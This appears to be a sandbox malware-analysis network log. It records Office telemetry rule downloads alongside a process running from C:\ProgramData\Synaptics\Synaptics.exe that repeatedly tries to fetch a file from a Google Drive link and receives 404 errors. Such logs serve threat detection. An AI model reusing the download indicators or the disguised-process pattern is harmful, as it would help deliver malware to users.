                                                                                        2024-12-05 21:50:49 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        97192.168.2.54989113.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:49 UTC192OUTGET /rules/rule120671v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:49 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:49 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 432
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT
                                                                                        ETag: "0x8DC582BAABA2A10"
                                                                                        x-ms-request-id: 0312aba8-e01e-0085-12cc-45c311000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215049Z-1746fd949bdb8xvchC1EWRmbd400000003ag000000001tm8
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:49 UTC432INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        98192.168.2.549892172.217.19.2384432180C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:49 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-05 21:50:50 UTC1314INHTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Thu, 05 Dec 2024 21:50:50 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-GerI1bcs6zI7i3Xa5DB5tQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        99192.168.2.549893142.250.181.1294432180C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:49 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Cache-Control: no-cache
                                                                                        Host: drive.usercontent.google.com
                                                                                        Connection: Keep-Alive
                                                                                        Cookie: NID=519=E2qOWQ5noWW8F60Fg6vQtwgyW2VEX3a759KV8GuVUalHhGuNG5nJt2mnliW_EIEctlonUtOkJ7269YI9zD81WZ2mWzRY3WQG982h6ijztVxt3jQYqg6EB0VChzrAFfkPH7PWdINLriHvYxY4IPw5kkYg4ofOUAdWixKZp50v_wqF6635qxanN2k
                                                                                        2024-12-05 21:50:50 UTC1253INHTTP/1.1 404 Not Found
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Thu, 05 Dec 2024 21:50:50 GMT
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-eS6xHG_99f5UpXjpFHLNdw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Content-Length: 1652
                                                                                        X-GUploader-UploadID: AFiumC6qjrilpL4icqobZaAxP-5gdPRpTwsNCMsET-bba3wyBsJOQfsrOncRX0r2S4J1Sh3T3ev9hu59Aw
                                                                                        Server: UploadServer
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                        Connection: close
                                                                                        2024-12-05 21:50:50 UTC137INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72
                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Err
                                                                                        2024-12-05 21:50:50 UTC1390INData Raw: 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 63 33 41 38 4a 41 66 51 61 6e 58 34 58 50 65 44 57 48 59 4c 73 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30
                                                                                        Data Ascii: or 404 (Not Found)!!1</title><style nonce="c3A8JAfQanX4XPeDWHYLsg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180
                                                                                        2024-12-05 21:50:50 UTC125INData Raw: 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                        Data Ascii: .</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        100192.168.2.549895142.250.181.1294432180C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:49 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Cache-Control: no-cache
                                                                                        Host: drive.usercontent.google.com
                                                                                        Connection: Keep-Alive
                                                                                        Cookie: NID=519=E2qOWQ5noWW8F60Fg6vQtwgyW2VEX3a759KV8GuVUalHhGuNG5nJt2mnliW_EIEctlonUtOkJ7269YI9zD81WZ2mWzRY3WQG982h6ijztVxt3jQYqg6EB0VChzrAFfkPH7PWdINLriHvYxY4IPw5kkYg4ofOUAdWixKZp50v_wqF6635qxanN2k
                                                                                        2024-12-05 21:50:50 UTC1253INHTTP/1.1 404 Not Found
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Thu, 05 Dec 2024 21:50:50 GMT
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-A8PAKgl1jFgw8q0UxuVSCA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Content-Length: 1652
                                                                                        X-GUploader-UploadID: AFiumC4KmJk45XUGCAkk-EvYORAtEnL8KQFsZAV7e2Tn6hBbPNkEbrRzWeXiufKmcZuKNcOnIxDr8U1S9Q
                                                                                        Server: UploadServer
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                        Connection: close
                                                                                        2024-12-05 21:50:50 UTC137INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72
                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Err
                                                                                        2024-12-05 21:50:50 UTC1390INData Raw: 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 7a 44 5f 70 6e 57 77 4e 7a 4c 44 63 69 73 71 4d 74 63 4f 59 4e 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30
                                                                                        Data Ascii: or 404 (Not Found)!!1</title><style nonce="zD_pnWwNzLDcisqMtcOYNg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180
                                                                                        2024-12-05 21:50:50 UTC125INData Raw: 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                        Data Ascii: .</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        101192.168.2.54989613.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:49 UTC192OUTGET /rules/rule120672v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:50 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:49 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 475
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                        ETag: "0x8DC582BBA740822"
                                                                                        x-ms-request-id: 4879dc54-201e-0096-5ac3-45ace6000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215049Z-1746fd949bd4w8sthC1EWR7004000000031g00000000e82f
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:50 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        102192.168.2.54989713.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:49 UTC192OUTGET /rules/rule120673v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:50 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:49 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 427
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT
                                                                                        ETag: "0x8DC582BB464F255"
                                                                                        x-ms-request-id: 1e2c2913-401e-0078-28cc-454d34000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215049Z-1746fd949bdqpttnhC1EWRe1wg00000002zg00000000pv7g
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:50 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        103192.168.2.549894172.217.19.2384432180C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:49 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-05 21:50:50 UTC1314INHTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Thu, 05 Dec 2024 21:50:50 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-yJ8saXNhHV6gGxbTu7QxfQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        104192.168.2.54990013.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:50 UTC192OUTGET /rules/rule120674v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:51 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:51 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 474
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                        ETag: "0x8DC582BA4037B0D"
                                                                                        x-ms-request-id: 74f9eb57-201e-003c-3ec2-4630f9000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215051Z-1746fd949bdqpttnhC1EWRe1wg000000030000000000kxr0
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:51 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        105192.168.2.54990113.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:51 UTC192OUTGET /rules/rule120675v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:52 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:51 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 419
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                        ETag: "0x8DC582BA6CF78C8"
                                                                                        x-ms-request-id: 859f66ca-901e-005b-0ccc-452005000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215051Z-1746fd949bdtlp5chC1EWRq1v4000000036000000000qbc0
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
